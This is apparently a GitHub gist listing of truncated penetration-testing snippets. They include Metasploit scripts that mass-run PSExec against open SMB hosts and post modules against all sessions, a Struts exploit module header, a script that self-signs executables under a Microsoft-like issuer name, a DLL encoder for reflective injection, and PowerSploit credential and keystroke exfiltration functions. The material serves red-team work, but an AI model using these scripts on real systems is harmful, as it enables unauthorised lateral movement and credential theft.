
Chris Gates carnal0wnage

@carnal0wnage
carnal0wnage / run_post_all_sessions.rb
Created February 27, 2016 14:52
run a metasploit post module against all active sessions
<ruby>
framework.sessions.each do |num|
  run_single("set SESSION #{num}")
  print_status("Running #{active_module.fullname} against session #{num}")
  run_single("exploit -j")
  sleep 1
end
</ruby>
@carnal0wnage
carnal0wnage / rapid_fire_psexec_servicename.rb
Last active May 7, 2018 00:22
Rapid Fire PSExec resource script uses service name instead of port number
<ruby>
hosts = []
begin
  framework.db.services.each do |service|
    if ( service.name =~ /smb/i and service.state == 'open' and service.proto == 'tcp')
      hosts << {'ip' => service.host.address}
    end
  end
end
@carnal0wnage
carnal0wnage / rapid_fire_psexec_portnum.rb
Last active July 13, 2016 00:29
Rapid Fire PSExec resource script uses port number instead of service name
<ruby>
hosts = []
begin
  framework.db.services.each do |service|
    if ( service.port == 445 and service.state == 'open' and service.proto == 'tcp')
      hosts << {'ip' => service.host.address}
    end
  end
end
@carnal0wnage
carnal0wnage / struts_default_action_mapper_roomwizard.rb
Created November 20, 2015 15:34
Exploit Module for roomwizard II Apache struts vulnerability
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
@carnal0wnage
carnal0wnage / signer.ps1
Created October 27, 2015 08:56
Create a Self-Signed Executable - Without Makecert.exe
function Invoke-CreateCertificate([string] $certSubject, [bool] $isCA)
{
    $CAsubject = $certSubject
    $dn = new-object -com 'X509Enrollment.CX500DistinguishedName'
    $dn.Encode( 'CN=' + $CAsubject, $dn.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
    # Issuer property for cleanup
    $issuer = 'Mycrosft'
    $issuerdn = new-object -com 'X509Enrollment.CX500DistinguishedName'
    $issuerdn.Encode('CN=' + $issuer, $dn.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
    # Create a new private key
@carnal0wnage
carnal0wnage / http_version_vhost.rb
Created August 16, 2015 13:15
metasploit resource script to use a list of hostnames, run http modules and set the VHOST as well
<ruby>
# variables
maxjobs = 5 # throttle if too many jobs are running at once
# default to 5 threads if THREADS has not been set globally
if (framework.datastore['THREADS'] == nil)
  run_single("setg THREADS 5")
end
@carnal0wnage
carnal0wnage / msgrpc_ssh_version.py
Last active April 19, 2020 14:22
python script to connect to a metasploit msgrpc instance, setup and run an auxilary module.
#!/usr/bin/env python
import sys
import msfrpc
import time

if __name__ == '__main__':
    # Create a new instance of the Msfrpc client with the default options
    client = msfrpc.Msfrpc({})
    # Login to the msf server using the password "abc123"
function Invoke-DllByteEncode
{
    # Encoder used to take a DLL and turn it into a base64-encoded byte array for PowerSploit's
    # Invoke-ReflectivePEInjection
    Param(
        [Parameter(Position = 0)]
        [String]
        $InputPath,
        [Parameter(Position = 1)]
        [String]
@carnal0wnage
carnal0wnage / gist:73ccc44c5b8fc5c53fcb
Last active August 16, 2016 10:27
PowerSploit Exfiltration Examples Documentation
PS C:\users\user\desktop\PowerSploit\PowerSploit\Exfiltration> Get-Command -Module Exfiltration

CommandType  Name                        ModuleName
-----------  ----                        ----------
Function     Get-GPPPassword             Exfiltration
Function     Get-Keystrokes              Exfiltration
Function     Get-TimedScreenshot         Exfiltration
Function     Get-VaultCredential         Exfiltration
Function     Get-VolumeShadowCopy        Exfiltration
Function     Invoke-CredentialInjection  Exfiltration